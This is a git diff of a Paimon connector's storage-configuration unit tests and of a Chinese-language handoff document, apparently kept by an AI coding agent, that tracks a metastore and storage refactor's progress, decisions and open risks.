FIRST (as the base), then overridden by the verbatim user hive.* copy. MUTATION: @@ -776,322 +753,6 @@ public void buildHmsHiveConfUserHivePropOverridesFileResource() { "a user hive.* prop must override the same key from the file base"); } - @Test - public void buildHmsHiveConfSingleArgUsesEmptyResources() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props("uri", "thrift://nn:9083")); - - // WHY: the back-compat 1-arg overload must behave exactly as before (empty file resources), - // so all existing callers/tests are unaffected. MUTATION: the 1-arg overload diverging from - // the 2-arg-with-empty-map -> red. - Assertions.assertEquals("thrift://nn:9083", hc.get("hive.metastore.uris")); - Assertions.assertEquals("10", hc.get("hive.metastore.client.socket.timeout")); - } - - // --------------------------------------------------------------------- - // FIX-FECONF-STORAGE-PARITY — S3 endpoint-from-region + divergent tuning defaults + path-style - // --------------------------------------------------------------------- - - @Test - public void buildHadoopConfigurationDerivesS3EndpointFromRegion() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "s3.access_key", "ak", - "s3.secret_key", "sk", - "s3.region", "us-west-2")); - - // WHY (user-approved parity, same defect class as the OSS P8-1 fix): a region-only AWS S3 catalog - // (no explicit endpoint) must still derive an endpoint so the FE Paimon FileIO can resolve it; legacy - // S3Properties.getEndpointFromRegion returns https://s3..amazonaws.com. MUTATION: dropping the - // derivation leaves fs.s3a.endpoint null while fs.s3a.endpoint.region is set -> red. - Assertions.assertEquals("https://s3.us-west-2.amazonaws.com", conf.get("fs.s3a.endpoint")); - Assertions.assertEquals("us-west-2", conf.get("fs.s3a.endpoint.region")); - } - - @Test - public void buildHadoopConfigurationEmitsS3TuningDefaults() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "s3.endpoint", "s3.amazonaws.com", - "s3.region", "us-east-1")); - - // WHY (BLOCKER-class parity, caught only by the completeness critic): legacy appendS3HdfsProperties - // ALWAYS emits the 4 tuning keys, and the AWS-S3 field DEFAULTS are 50/3000/1000 (S3Properties), - // NOT the 100/10000/10000 the object stores use. A single shared default would silently mis-tune - // every AWS S3 paimon catalog. MUTATION: emitting no tuning keys (today) or the 100/10000/10000 - // object-store values for the S3 path -> red. - Assertions.assertEquals("50", conf.get("fs.s3a.connection.maximum")); - Assertions.assertEquals("3000", conf.get("fs.s3a.connection.request.timeout")); - Assertions.assertEquals("1000", conf.get("fs.s3a.connection.timeout")); - Assertions.assertEquals("false", conf.get("fs.s3a.path.style.access")); - } - - @Test - public void buildHadoopConfigurationEmitsS3PathStyleFromAlias() { - Configuration pathStyle = PaimonCatalogFactory.buildHadoopConfiguration(props( - "s3.endpoint", "minio:9000", - "s3.region", "us-east-1", - "use_path_style", "true")); - Configuration s3Alias = PaimonCatalogFactory.buildHadoopConfiguration(props( - "s3.endpoint", "minio:9000", - "s3.region", "us-east-1", - "s3.path-style-access", "true")); - - // WHY (P8-2/P9-3, MinIO/path-style): fs.s3a.path.style.access must be derived from either the - // use_path_style or s3.path-style-access alias; before the fix it was never emitted, so a MinIO / - // path-style bucket was hit virtual-hosted-style and failed. MUTATION: not reading the alias (always - // false) -> red. - Assertions.assertEquals("true", pathStyle.get("fs.s3a.path.style.access")); - Assertions.assertEquals("true", s3Alias.get("fs.s3a.path.style.access")); - } - - // --------------------------------------------------------------------- - // FIX-FECONF-STORAGE-PARITY — OSS endpoint-from-region (filesystem + hms) + S3A base - // --------------------------------------------------------------------- - - @Test - public void buildHadoopConfigurationDerivesOssEndpointFromRegion() { - Configuration internal = PaimonCatalogFactory.buildHadoopConfiguration(props( - "oss.access_key", "ak", - "oss.secret_key", "sk", - "oss.region", "cn-hangzhou")); - - // WHY (P8-1/P8-3): a filesystem-flavor OSS catalog with only a region (no explicit oss.endpoint) must - // derive the OSS endpoint, mirroring legacy OSSProperties.getOssEndpoint(region, dlfAccessPublic). The - // DEFAULT (dlfAccessPublic=false) is the -internal endpoint. Before the fix the derivation lived only - // in the DLF flavor, so a filesystem OSS catalog got fs.oss.endpoint=null -> FileIO could not resolve. - // MUTATION: no derivation for the filesystem path, or deriving the public form by default -> red. - Assertions.assertEquals("oss-cn-hangzhou-internal.aliyuncs.com", internal.get("fs.oss.endpoint")); - - Configuration pub = PaimonCatalogFactory.buildHadoopConfiguration(props( - "oss.access_key", "ak", - "oss.secret_key", "sk", - "oss.region", "cn-hangzhou", - "dlf.access.public", "true")); - // WHY: dlf.access.public=true selects the public (no -internal) form, even for a filesystem OSS - // catalog. MUTATION: ignoring the public flag on the shared OSS path -> red. - Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", pub.get("fs.oss.endpoint")); - } - - @Test - public void buildHmsHiveConfDerivesOssEndpointFromRegion() { - HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( - "uri", "thrift://nn:9083", - "oss.access_key", "ak", - "oss.secret_key", "sk", - "oss.region", "cn-shanghai")); - - // WHY (parity completeness, RT-skeptic-3): moving the OSS endpoint-from-region derivation into the - // shared applyCanonicalOssConfig also grants the HMS flavor the same legacy OSSProperties.of() - // derivation it always had via fe-core. MUTATION: deriving only on the filesystem/dlf paths and not - // when applyStorageConfig is overlaid onto a HiveConf -> red. - Assertions.assertEquals("oss-cn-shanghai-internal.aliyuncs.com", hc.get("fs.oss.endpoint")); - } - - @Test - public void buildHadoopConfigurationEmitsS3aBaseForOssCatalog() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "oss.access_key", "oss-ak", - "oss.secret_key", "oss-sk", - "oss.endpoint", "oss-cn-hangzhou.aliyuncs.com")); - - // WHY (P8-1/P8-3, RT-skeptic-1/4): legacy OSS inherits the full S3A base via super.appendS3HdfsProperties - // (for s3://-over-OSS back-compat); before the fix applyCanonicalOssConfig emitted ONLY Jindo fs.oss.* - // keys. The S3A base must carry the OSS-resolved endpoint/creds (NOT re-resolved from s3.* aliases) and - // the OSS tuning default (100, NOT the S3 50). MUTATION: OSS block skipping the S3A base (fs.s3a.impl - // null), or emitting the S3 tuning default -> red. - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); - Assertions.assertEquals("oss-ak", conf.get("fs.s3a.access.key")); - Assertions.assertEquals("oss-cn-hangzhou.aliyuncs.com", conf.get("fs.s3a.endpoint")); - Assertions.assertEquals("100", conf.get("fs.s3a.connection.maximum")); - // The Jindo OSS keys remain (unchanged behavior). - Assertions.assertEquals("com.aliyun.jindodata.oss.JindoOssFileSystem", conf.get("fs.oss.impl")); - Assertions.assertEquals("oss-ak", conf.get("fs.oss.accessKeyId")); - } - - // --------------------------------------------------------------------- - // FIX-FECONF-STORAGE-PARITY — COS / OBS (P9-2) - // --------------------------------------------------------------------- - - @Test - public void buildHadoopConfigurationEmitsCosKeysForCosCatalog() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "cosn://bucket/wh", - "cos.access_key", "cak", - "cos.secret_key", "csk", - "cos.endpoint", "cos.ap-beijing.myqcloud.com")); - - // WHY (P9-2): a cosn:// paimon catalog needs the Tencent COS FileSystem impl + cosn credentials; before - // the fix there was NO COS handling at all. fs.cosn.impl=S3AFileSystem makes cosn:// an S3A instance, so - // the S3A base (endpoint/creds, resolved from the cos.* aliases) is ALSO load-bearing. MUTATION: no COS - // block (fs.cosn.impl null), or not threading the cos.* creds into the S3A base -> red. - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.cosn.impl")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.cos.impl")); - Assertions.assertEquals("cak", conf.get("fs.cosn.userinfo.secretId")); - Assertions.assertEquals("csk", conf.get("fs.cosn.userinfo.secretKey")); - // S3A base carries the cos endpoint + creds + the object-store tuning default. - Assertions.assertEquals("cos.ap-beijing.myqcloud.com", conf.get("fs.s3a.endpoint")); - Assertions.assertEquals("cak", conf.get("fs.s3a.access.key")); - Assertions.assertEquals("100", conf.get("fs.s3a.connection.maximum")); - } - - @Test - public void buildHadoopConfigurationDetectsCosByEndpointPattern() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "cosn://bucket/wh", - "s3.access_key", "ak", - "s3.secret_key", "sk", - "s3.endpoint", "cos.ap-beijing.myqcloud.com")); - - // WHY (RT-skeptic-2, the framing fix): legacy detects COS by ENDPOINT PATTERN (myqcloud.com), NOT by a - // cos.* key. A cosn:// catalog configured with only s3.* keys + an s3.endpoint pointing at a myqcloud - // endpoint must STILL get fs.cosn.impl (a cos.*-key-only gate would miss it and the cosn:// warehouse - // would have no COS FileSystem impl). MUTATION: gating COS only on cos.* keys -> fs.cosn.impl null -> red. - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.cosn.impl")); - Assertions.assertEquals("ak", conf.get("fs.cosn.userinfo.secretId")); - } - - @Test - public void buildHadoopConfigurationEmitsCosRegionUnconditionally() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "cosn://bucket/wh", - "cos.access_key", "cak", - "cos.secret_key", "csk", - "cos.endpoint", "cos.ap-beijing.myqcloud.com")); - - // WHY: COSProperties writes fs.cosn.bucket.region UNCONDITIONALLY (always emitted, never absent). After the - // migration to the shared fe-property COSProperties, the region is DERIVED from the - // cos..myqcloud.com endpoint (faithful to legacy COSProperties.endpointPatterns) — so a cosn - // catalog with an endpoint but no explicit cos.region now gets the endpoint-derived region instead of the - // old hand-port's blank value. MUTATION: not emitting fs.cosn.bucket.region -> red. - Assertions.assertEquals("ap-beijing", conf.get("fs.cosn.bucket.region")); - } - - @Test - public void buildHadoopConfigurationEmitsObsKeysForObsCatalog() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "obs://bucket/wh", - "obs.access_key", "oak", - "obs.secret_key", "osk", - "obs.endpoint", "obs.cn-north-4.myhuaweicloud.com")); - - // WHY (P9-2): an obs:// paimon catalog needs the Huawei OBS FileSystem impl + obs credentials; before - // the fix there was NO OBS handling. The impl is native OBSFileSystem when classpath-available, else the - // S3A fallback (classpath-dependent, so accept either), but the creds/endpoint are load-bearing. - // MUTATION: no OBS block (fs.obs.access.key null) -> red. - String obsImpl = conf.get("fs.obs.impl"); - Assertions.assertTrue("org.apache.hadoop.fs.obs.OBSFileSystem".equals(obsImpl) - || "org.apache.hadoop.fs.s3a.S3AFileSystem".equals(obsImpl), - "fs.obs.impl must be the native OBS impl or the S3A fallback, got: " + obsImpl); - Assertions.assertEquals("oak", conf.get("fs.obs.access.key")); - Assertions.assertEquals("osk", conf.get("fs.obs.secret.key")); - Assertions.assertEquals("obs.cn-north-4.myhuaweicloud.com", conf.get("fs.obs.endpoint")); - } - - @Test - public void buildHadoopConfigurationDetectsObsByEndpointPattern() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "obs://bucket/wh", - "s3.access_key", "ak", - "s3.secret_key", "sk", - "s3.endpoint", "obs.cn-north-4.myhuaweicloud.com")); - - // WHY (RT-skeptic-2): legacy detects OBS by the myhuaweicloud.com endpoint pattern, not an obs.* key. - // An obs:// catalog with only s3.* keys must still get fs.obs.*. MUTATION: obs.*-key-only gate -> red. - Assertions.assertNotNull(conf.get("fs.obs.impl")); - Assertions.assertEquals("ak", conf.get("fs.obs.access.key")); - } - - @Test - public void buildHadoopConfigurationDoesNotEmitCosOrObsForPlainS3() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "s3://bucket/wh", - "s3.access_key", "ak", - "s3.secret_key", "sk", - "s3.endpoint", "s3.us-east-1.amazonaws.com")); - - // WHY (RT-skeptic-2, negative parity): a plain AWS S3 catalog (no cos./obs. key, no myqcloud/ - // myhuaweicloud endpoint) must NOT trigger the COS or OBS blocks. MUTATION: a detection gate that - // fires COS/OBS on shared s3.* keys -> fs.cosn.impl/fs.obs.impl emitted for a pure-S3 catalog -> red. - Assertions.assertNull(conf.get("fs.cosn.impl")); - Assertions.assertNull(conf.get("fs.obs.impl")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); - } - - // --------------------------------------------------------------------- - // FIX-PAIMON-MINIO-STORAGE — canonical minio.* alias translation - // (ported legacy MinioProperties: S3A-compatible, schema "s3") - // --------------------------------------------------------------------- - - @Test - public void buildHadoopConfigurationTranslatesCanonicalMinioCredentials() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "s3://warehouse/wh", - "minio.endpoint", "http://10.0.0.1:9000", - "minio.access_key", "admin", - "minio.secret_key", "password")); - - // WHY (the reported bug): a filesystem paimon catalog created with the documented minio.* keys - // (test_paimon_minio.groovy) must reach the S3A FileIO over s3://. Before this fix applyStorageConfig - // recognized only s3.*/oss.*/cos.*/obs.*/raw fs.* keys, so EVERY minio.* alias resolved null, - // applyCanonicalS3Config early-returned, and fs.s3.impl was never set -> Paimon FileIO.get threw - // "Could not find a file io implementation for scheme 's3'". The load-bearing assertion is fs.s3.impl - // (the missing registration); the credentials/endpoint follow from the same S3A base. MUTATION: - // dropping the minio block leaves fs.s3.impl / fs.s3a.access.key null -> red. - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3.impl")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.S3AFileSystem", conf.get("fs.s3a.impl")); - Assertions.assertEquals("http://10.0.0.1:9000", conf.get("fs.s3a.endpoint")); - Assertions.assertEquals("admin", conf.get("fs.s3a.access.key")); - Assertions.assertEquals("password", conf.get("fs.s3a.secret.key")); - Assertions.assertEquals("org.apache.hadoop.fs.s3a.SimpleAWSCredentialsProvider", - conf.get("fs.s3a.aws.credentials.provider")); - } - - @Test - public void buildHadoopConfigurationMinioDefaultsRegionAndObjectStoreTuning() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "s3://warehouse/wh", - "minio.endpoint", "http://10.0.0.1:9000", - "minio.access_key", "admin", - "minio.secret_key", "password")); - - // WHY (parity with legacy MinioProperties defaults): MinioProperties defaults region to us-east-1 and - // the connection tuning to 100/10000/10000 (NOT the S3Properties 50/3000/1000). A dedicated MinIO block - // is required precisely so these defaults are not silently taken from the S3 block. MUTATION: routing - // minio.* through the S3 block's defaults -> region absent + maxConn 50 -> red. - Assertions.assertEquals("us-east-1", conf.get("fs.s3a.endpoint.region")); - Assertions.assertEquals("100", conf.get("fs.s3a.connection.maximum")); - Assertions.assertEquals("10000", conf.get("fs.s3a.connection.request.timeout")); - Assertions.assertEquals("10000", conf.get("fs.s3a.connection.timeout")); - } - - @Test - public void buildHadoopConfigurationMinioExplicitRegionWins() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "s3://warehouse/wh", - "minio.endpoint", "http://10.0.0.1:9000", - "minio.access_key", "admin", - "minio.secret_key", "password", - "minio.region", "us-west-2")); - - // WHY: an explicit minio.region must override the us-east-1 default (the test_paimon_minio - // *_with_region catalogs depend on this). MUTATION: hardcoding the default region -> red. - Assertions.assertEquals("us-west-2", conf.get("fs.s3a.endpoint.region")); - } - - @Test - public void buildHadoopConfigurationPlainS3DoesNotTriggerMinioDefaults() { - Configuration conf = PaimonCatalogFactory.buildHadoopConfiguration(props( - "warehouse", "s3://bucket/wh", - "s3.access_key", "ak", - "s3.secret_key", "sk", - "s3.endpoint", "s3.us-east-1.amazonaws.com")); - - // WHY (negative parity): a pure s3.* catalog (no minio. key) must NOT trip the minio block, which would - // clobber the S3 tuning defaults (50/3000/1000) with the object-store ones (100/10000/10000). MUTATION: - // a minio gate that fires on shared s3.* keys -> fs.s3a.connection.maximum 100 -> red. - Assertions.assertEquals("50", conf.get("fs.s3a.connection.maximum")); - Assertions.assertEquals("3000", conf.get("fs.s3a.connection.request.timeout")); - Assertions.assertEquals("1000", conf.get("fs.s3a.connection.timeout")); - } - // --------------------------------------------------------------------- // FIX-FECONF-STORAGE-PARITY — HMS username alias (P8-4) // --------------------------------------------------------------------- @@ -1100,7 +761,7 @@ public void buildHadoopConfigurationPlainS3DoesNotTriggerMinioDefaults() { public void buildHmsHiveConfResolvesUsernameFromHiveMetastoreUsernameAlias() { HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( "uri", "thrift://nn:9083", - "hive.metastore.username", "hms-user")); + "hive.metastore.username", "hms-user"), Collections.emptyMap(), Collections.emptyMap()); // WHY (P8-4): legacy HMSBaseProperties binds the username from {hive.metastore.username, hadoop.username} // and sets HADOOP_USER_NAME (= "hadoop.username"). Before the fix the connector only copied the literal @@ -1114,7 +775,7 @@ public void buildHmsHiveConfUsernameAliasPriorityHiveMetastoreWins() { HiveConf hc = PaimonCatalogFactory.buildHmsHiveConf(props( "uri", "thrift://nn:9083", "hive.metastore.username", "primary", - "hadoop.username", "secondary")); + "hadoop.username", "secondary"), Collections.emptyMap(), Collections.emptyMap()); // WHY: legacy alias order lists hive.metastore.username FIRST, so it wins when both are set. // MUTATION: reversing the priority (hadoop.username wins) -> red. diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 45c05fa7db6046..242d237c22c6fb 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -7,56 +7,50 @@ --- -**更新时间**:2026-06-17(实现 session:P0 全部 + P1-T01/T02) +**更新时间**:2026-06-17(实现 session:P1-T03 完成) **更新人**:Claude(Opus 4.8) ## 这次 session 完成了什么 -1. **进入 Implement**,用户批准范围 = **P0 + P1(storage 收口),做到 P1-T06 gate 停**。 -2. **完成 P0(2/2)+ P1-T01/T02**,共 **5 个 commit**(均 TDD + checkstyle 0 + 红线核对): - - `5bf6cee` **P0-T01**:4-agent recon 三套 StorageProperties + 连接器 seam → 结论 + 定向。 - - `0f50a13` **P0-T02**:`FileSystemPluginManager.bindAll(rawMap)`(raw map → List,全量收集 supporting providers、skip 未迁移 bind 的 legacy)。TDD 5/5。 - - `ffd5466` **P1-T01**:`ConnectorContext.getStorageProperties()` 默认空列表 + `fe-connector-spi → fe-filesystem-api` pom 边。TDD 1/1,import-gate PASS。 - - `5520975` **P1-T02**:`DefaultConnectorContext.getStorageProperties()`(`getOrigProps()` 取 raw map → factory)+ `FileSystemFactory.bindAllStorageProperties()`(取 live plugin manager)。TDD 4/4 + 回归 2/2。 - - `4d190a7` **DV-002 决策记录**(T1 框架)。 -3. **3 个决策定稿**(均用户拍板): - - **D-009**:bind-all 机制 A = fe-core `FileSystemPluginManager.bindAll` + `DefaultConnectorContext.getStorageProperties()` 经 `getOrigProps()`;二次确认 **3 个 fe-core 文件**(+`FileSystemFactory` static accessor 取 live manager,因对象存储 provider 是运行时目录插件)。 - - **DV-001**:P0-1「fe-filesystem-api 已够、唯一 fe-core 改动」预期被证伪(缺 bind-all 入口)。 - - **DV-002**:T1「全等」放宽为 **常见静态凭据路径全等 + 文档记超集**(fe-filesystem 是 fe-property 路的超集:S3 role/anon、OSS/COS/OBS endpoint 无条件、BE map 多 AWS_BUCKET/ROOT_PATH/CREDENTIALS_PROVIDER_TYPE)。 -4. 同步回写:设计 §4 P0-1/P0-2 + §2.1 + §5 T1、WORKFLOW §4.1 白名单(+2 fe-core 文件)+ §5.2 T1、decisions D-009、deviations DV-001/DV-002、risks R-004(3 处)/R-001、tasks、PROGRESS。 +1. **P1-T03 ✅**(commit `[P1-T03]`,连接器侧首个 task):paimon `PaimonCatalogFactory.applyStorageConfig` 从 fe-property `StorageProperties.buildObjectStorageHadoopConfig(props)` 改为吃**预算好的** `storageHadoopConfig` 入参;保留其后 `paimon.*/fs./dfs./hadoop.` 覆盖块(last-write-wins)。`PaimonConnector` 新增 `buildStorageHadoopConfig()`,遍历 `ctx.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()` 合并,传入 3 个 `buildXxx`(REST 不用)。pom 加 `fe-filesystem-api` 直接依赖(fe-property 依赖**留** P1-T05 删)。 +2. **TDD**:neuter `storageHadoopConfig.forEach(setter)` → 3 个 Applies/Overlays 测试 RED(`expected was `)→ 恢复 → GREEN。 +3. **测试改造**:删 ~23 canonical-translation 测试(S3/OSS/COS/OBS/MinIO 翻译=fe-filesystem 职责)+ adapt 保留测试 + 新增 6 契约测试(storage map 落 conf×3 builder + explicit-fs.s3a-overrides-storage + paimon-prefix-overrides-storage + kerberos-survives-storage-overlay)。 +4. **验证**:paimon 全模块 **292/0/0/1skip**(docker-gated `PaimonLiveConnectivityTest`),`PaimonCatalogFactoryTest` 42/0,**checkstyle 0**、`tools/check-connector-imports.sh` PASS、`git diff --name-only` 白名单干净。 +5. **对抗 review**(`wf_76df09a4-c2f`,8 agent,4 lens + verify):1 BLOCKER+3 MAJOR+2 MINOR;verify 推翻假 BLOCKER(删 buildHmsHiveConf 重载=唯 paimon 调用方全已改)+2 MAJOR(endpoint-pattern/OSS-derivation 经直接核实 fe-filesystem 已覆盖);**confirm 1 MAJOR=R-006**(调优默认 50/3000/1000、100/10000/10000 在 fe-filesystem **无显式 UT 守护**;**功能今日正确**=字段默认真发,仅测试健壮性缺口)→ 记 R-006 + 加 1 个 in-scope kerberos-storage 测试。 +6. **决策/偏差**:**DV-003**(T1 落地=Option C:connector-local 契约 UT + docker P1-T06 兜底,因 fe-filesystem 对象存储 impl 是运行时插件不在任何单测 classpath;并 DV-003-b:fe-property import 已在 T03 删,P1-T05 退化为仅删 pom 边 + grep 闸)。回写:tasks P1-T03、deviations DV-003、risks R-001(修订)/R-006(新)、PROGRESS。 ## 当前状态 -- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 2/6)**。 -- 任务计数 **4/14**(P0: 2/2 ✅ | P1: 2/6 | P2: 0/5 | P3a: 0/1)。 -- **fe-core/spi 侧管线已通且全绿**:`CatalogProperty.getProperties()`(raw) →(`DefaultConnectorContext.getStorageProperties()` 内)任一 typed 值 `getOrigProps()` → `FileSystemFactory.bindAllStorageProperties()` → live `FileSystemPluginManager.bindAll()` → `List` → `ConnectorContext.getStorageProperties()`(连接器待 P1-T03 消费)。 -- fe-core 改动 = **3 文件全 additive**:`DefaultConnectorContext`(+getStorageProperties)、`fs/FileSystemPluginManager`(+bindAll)、`fs/FileSystemFactory`(+bindAllStorageProperties)。 -- ⚠️ **e2e/docker 未跑**(本 session 仅 compile + 单测)。 +- 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧(P1 3/6)**。 +- 任务计数 **5/14**(P0: 2/2 ✅ | P1: 3/6 | P2: 0/5 | P3a: 0/1)。 +- **连接器 storage 配置路已切**:`CREATE CATALOG raw map` →(fe-core)`bindAll` → `ctx.getStorageProperties()`(fe-filesystem typed)→(连接器)`PaimonConnector.buildStorageHadoopConfig()` 合并 `toHadoopConfigurationMap()` → 3 个 `buildXxx` 叠加(+paimon.*/raw 覆盖 last-write-wins)。 +- paimon main 已**零** `org.apache.doris.property` import(grep 归零);`fe-property` pom 依赖仍在(变 0 import 消费者,P1-T05 删边)。 +- ⚠️ **e2e/docker 未跑**(本 session 仅 compile + UT + 对抗 review)。 -## 下一步(明确):P1-T03(连接器侧首个 task) -> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** 下面是已知方案,但 paimon 连接器调用流须现场核实。 +## 下一步(明确):P1-T04(BE 静态凭据改走 toBackendProperties().toMap()) +> **务必先按顶部流程:读文档 + 对照真实代码 review 方案再动手。** 下面是已知方案,但须现场核实。 -**目标**:paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties()` 的 `toHadoopProperties().toHadoopConfigurationMap()`,取代 `fe-property StorageProperties.buildObjectStorageHadoopConfig(props)`;**保留**其后 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins,有历史 bug 注释为证)。 +**目标**:paimon `PaimonScanPlanProvider` 的 BE 静态凭据从 `context.getBackendStorageProperties()`(`PaimonScanPlanProvider.java:606`)改为「遍历 `ctx.getStorageProperties()` 调 `toBackendProperties().orElseThrow().toMap()`」合并出 AWS_* map。**vended 动态路径不动**(仍 `ctx.vendStorageCredentials`,D-008;用户定 A=全量切静态、vended 不碰)。 **先做 recon(关键未知)**: -- `PaimonCatalogFactory` 是**纯静态 util**(无 ctx 字段,只吃 raw `Map props`);`applyStorageConfig(props, setter)` 现调静态 fe-property 方法。3 调用方:`buildHadoopConfiguration`(:367)、`buildHmsHiveConf`(:478)、`buildDlfHiveConf`(:589)。 -- **须查清**:连接器在哪里调这些 `PaimonCatalogFactory.buildXxx`?那里 `ConnectorContext`(→`getStorageProperties()`)/`List` 能否拿到?→ 把 storage list 线程进 `applyStorageConfig`(签名重构),或在调用点先算好 hadoop map 传入。grep `PaimonCatalogFactory.` 找调用方(大概率在 `PaimonConnector`/catalog 创建路径,且在 `ctx.executeAuthenticated` 内)。 -- 注意 fe-property 现路是 object-store-only(HDFS 不贡献,靠 overlay 的 raw passthrough);fe-filesystem 同理(bindAll skip HDFS)。两边对齐。 +- 读 `PaimonScanPlanProvider.java:600-620` 现有 `getBackendStorageProperties()` 消费点(合并进 scan range location props 的循环);确认 `ctx`(`context` 字段)在该方法可达(应可达,与 catalog 路同 ctx)。 +- `StorageProperties.toBackendProperties()` 返回 `Optional`,`.toMap()` 出 `AWS_*`。注意 fe-filesystem BE map 是**超集**(多 `AWS_BUCKET`/`AWS_ROOT_PATH`/`AWS_CREDENTIALS_PROVIDER_TYPE`,DV-002)——T1 钉常见路径全等 + 记超集(同 P1-T03 的 Option C:真等价 docker 兜底)。 +- vended 叠加顺序:legacy vended REPLACE/overlay 静态(见 catalog-spi P5 FIX-1 记忆);确认改后 vended 仍后叠(精确保序)。 -**T1 等价性测试(R-001 闸,DV-002 框架)**:fe-filesystem `toHadoopConfigurationMap()` 产物 vs fe-property `buildObjectStorageHadoopConfig` 现产物,在**常见静态凭据路径**(S3/OSS/COS/OBS 配齐 endpoint/region/AK/SK、无 role、无 vended)下 key/value **全等**;超集差异(S3 role/anon、endpoint 无条件、BE 多键)写注释记录,不当漂移。 +**编译/测**:`mvn -f /mnt/disk1/yy/git/wt-catalog-spi/fe/pom.xml -pl fe-connector/fe-connector-paimon -am package -Dassembly.skipAssembly=true -Dmaven.build.cache.enabled=false`(看 `BUILD SUCCESS` 行);`-Dtest=PaimonScanPlanProviderTest` 聚焦。checkstyle 0、import-gate PASS。 -**编译/测**:paimon 模块需 `mvn ... -am package -Dassembly.skipAssembly=true`(shade jar 携带 HiveConf);`-Dmaven.build.cache.enabled=false` 确保 surefire 真跑;后台 task 看 `BUILD SUCCESS/FAILURE` 行非 echo exit code。 - -**之后**:P1-T04(BE 凭据切 `getStorageProperties().toBackendProperties().toMap()`,用户定 A=全量切,vended 路不动)→ P1-T05(删 paimon→fe-property pom 依赖 + import;`grep org.apache.doris.property` 归零,**不删 fe-property 模块**)→ P1-T06(UT + T1 + docker 5 flavor,不跑则标「未跑 e2e」)。 +**之后**:P1-T05(删 paimon→fe-property **pom 依赖边** + `grep org.apache.doris.property` 归零闸;import 已在 T03 删,DV-003-b)→ P1-T06(paimon UT + docker `enablePaimonTest=true` 5 flavor,**真 T1 等价闸 + 验 R-006 调优默认**;不跑则标「未跑 e2e」)。 ## 未决 / 需注意 -- ✅ 已定:范围 P0+P1(到 P1-T06)|机制 A(D-009,3 fe-core 文件)|T1 框架 A(DV-002)。 -- ❓ P1-T03 唯一现场未知 = **连接器调 `PaimonCatalogFactory.buildXxx` 处 ctx/storageList 的可达性**(决定签名重构形态)——recon 后若发现需改连接器其它文件或有阻碍,停下 AskUserQuestion。 +- ✅ 已定:范围 P0+P1(到 P1-T06)|机制 A(D-009)|T1=Option C(DV-003)。 +- ❗ **R-006(confirm,需用户定夺)**:fe-filesystem 对调优默认值(S3 50/3000/1000、OSS/COS/OBS 100/10000/10000)**无显式 UT 守护**(删 paimon canonical 测试暴露)。**功能今日正确**(字段默认真发),docker P1-T06 运行期兜底。**修法(超 P1 白名单,禁碰 fe-filesystem)**=在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 test-only 断言 → **建议作 follow-up / 经用户批准的小补丁**,不在 paimon 重复断言(Option C:paimon 无 fe-filesystem impl 于测试 classpath,合成 map 断言同义反复)。**下次 session 可向用户确认是否纳入。** - ⚠️ e2e 全程未跑;P1-T06 前如不部署 docker,明确标「未跑 e2e」(CLAUDE.md Rule 12)。 -## 红线提醒(WORKFLOW §4,本 session 已扩张 2 次) -- **可动**(白名单):`fe-connector-paimon/**`(P1-T03+ 改造)、`fe-connector-spi/**`(已加 getStorageProperties,勿再扩)、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法**,勿碰既有方法)、相关 pom(仅依赖增删)、本跟踪目录。 -- **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、fe-filesystem 各模块、`fe-property` 模块删除。 -- 每次提交前 `git diff --name-only` 对照白名单;3 个 fe-core 文件 `git diff` 须只见新增。 +## 红线提醒(WORKFLOW §4) +- **可动**(白名单):`fe-connector-paimon/**`(P1-T04+ 改造)、`fe-connector-spi/**`(勿再扩)、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法**)、相关 pom(仅依赖增删)、本跟踪目录。 +- **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**fe-filesystem 各模块**(含其 